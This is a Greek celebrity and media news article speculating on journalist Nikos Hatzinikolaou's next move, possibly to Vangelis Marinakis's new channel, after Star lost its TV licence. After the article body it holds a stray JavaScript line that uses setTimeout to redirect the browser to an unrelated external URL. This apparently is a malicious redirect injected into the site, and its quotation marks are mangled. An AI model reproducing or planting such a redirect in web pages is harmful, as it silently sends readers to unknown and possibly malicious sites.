Πάει ο Νίκος Χατζηνικολάου στο νέο κανάλι του Βαγγέλη Μαρινάκη;

0
35

Πολλά λέγονται και γράφονται τις τελευταίες μέρες για το επόμενο επαγγελματικό βήμα του Νίκου Χατζηνικολάου στον τηλεοπτικό χώρο, μετά την απόφαση της οικογένειας Βαρδινογιάννη να μη μετάσχει στην «πλειοδοσία τρέλας», που εκτόξευσε σε παρανοικά ύψη τα τιμήματα για την απόκτηση τηλεοπτικών αδειών. Το τελευταίο σενάριο τον φέρει να βρίσκεται σε προχωρημένες συζητήσεις με τον Βαγγέλη Μαρινάκη για να αναλάβει τη διεύθυνση του ενημερωτικού τομέα και την παρουσίαση του κεντρικού δελτίου, του υπό δημιουργία καναλιού.

Ποια είναι η αλήθεια; Ο κορυφαίος δημοσιογράφος,  έως τώρα, δεν έχει συζητήσει τίποτα και με κανέναν. Από τις αρχές του καλοκαιριού είχε συμφωνήσει με τον Γιάννη Βαρδινογιάννη να μη συνεχίσει τον καθημερινό σχολιασμό στις ειδήσεις του Star και να διατηρήσει μόνο την επιτυχημένη εβδομαδιαία εκπομπή του «Στον ενικό¨, όπως και την παρουσίαση μεγάλων γεγονότων -πχ της εκλογικής βραδιάς.

Από τη στιγμή που το Star δεν κέρδισε τηλεοπτική άδεια, λογικό είναι να μην έχει νόημα η μετάδοση της εκπομπής του μόνο για τρεις μήνες -μέχρις ότου, δηλαδή η Digea ρίξει «μαύρο» στα κανάλια που δεν πήραν άδεια. Αναμενόμενο είναι, επίσης, να ενδιαφερθούν για εκείνον όχι μόνο ένας, αλλά και δυο από τους σταθμούς που εξασφάλισαν άδεια…

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here